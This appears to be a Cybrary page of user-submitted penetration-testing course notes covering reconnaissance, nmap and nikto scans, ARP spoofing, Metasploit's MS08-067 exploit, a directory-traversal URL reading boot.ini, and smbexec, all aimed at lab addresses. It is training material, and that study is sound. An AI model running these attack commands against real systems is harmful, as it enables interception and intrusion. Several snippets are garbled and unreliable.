Advanced Penetration Testing Notes

information gathering

1. whois 2. nslookup 3. fierce -dns 4. host -t  5.zonetransfer: host -l   [view]

By: chennylmf | Related Lesson: Information Gathering (part 3) Targeting Email and Maltego | Modified: March 24, 2018

part 2

  (Part 2: Vulnerable Web Applications)   192.168.1.23/bookservice (Windows 7 apps)   burpsuite   java burpsuite.jar   locate burpesuite   On Applications, go to Kali Linux, go to Web Applications, go to Web Application Proxies, click burpsuite [view]

By: GrapeApe561 | Related Lesson: WebApp (part 2) Vulnerable Web Applications | Modified: March 24, 2018

cut

cat file | cut -d ” ” -f 1 sort -u [view]

By: Musaid | Related Lesson: Linux (part 4) chmod, manipulation and packages | Modified: March 24, 2018

arp spoof

arpspoof -i eth0 -t 192.168.1.76 192.168.1.80 [view]

By: amine.atarboulaich | Related Lesson: Traffic Capture (part 3) Address Resolution Protocol ARP | Modified: March 22, 2018

vul scan web app

mysql  -h 192.168.1.76 http://192.168.1.76 cadaver http://192.168.1.76/webdav dirbuster nikto -h http://localhodt   [view]

By: amine.atarboulaich | Related Lesson: Vulnerability Scanning (part 5) WebApp, XAMPP, WEBDAV, nikto | Modified: March 22, 2018

vuls scan

msfconsole   use auxiliary/scanner/ftp/anonymous show options cat class.gnmap | grep Up |cut -d ” ” -f  2 | sort -u >livehost.txt set RHOSTS file:/root/livehosts.txt run use exploit/windows/smb/ms08_067_netapi show options set rhost [view]

By: amine.atarboulaich | Related Lesson: Vulnerability Scanning (part 4) Metasploit | Modified: March 22, 2018

nmap vul scan

cd/usr/share/nmap/scripts/ nmap –script-help default nmap –script-help smb-check-vulns nmap –script-help nfs-ls nmap -sC 192.168.1.76 192.168.1.80   [view]

By: amine.atarboulaich | Related Lesson: Vulnerability Scanning (part 3) Nmap Scripting Engine | Modified: March 22, 2018

vulnerability scanning

zervit 0.4 source code review —— zervit web server  <ip(metasploit-linux):3232/index.html?.././../../boot.ini [view]

By: dhruvgupta179 | Related Lesson: Vulnerability Scanning (part 6) Directory Transversals | Modified: March 22, 2018

part 4

(Part 4: Setting Up a Domain Controller) cd /opt/smbexec (Might not need to do this if it doesn’t work) ./smbexec.rb Select Choice 1, then Choice 7,  then type Windows 7 IPv4 address when prompted with ”Target IP, host list, or nmap XML [view]

By: GrapeApe561 | Related Lesson: Post Exploitation (part 4) Setting Up a Domain Controller | Modified: March 21, 2018

NMAP

nc -v ip nmap -sS ip -p  3232 nmap -sU ip pi =! -oA classudp -sV classversion [view]

By: amine.atarboulaich | Related Lesson: Information Gathering (part 5) NMAP and PortScanning | Modified: March 21, 2018

« First ‹ Previous 1 2 10 11 12 13 14 22 112 243 Next › Last »

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel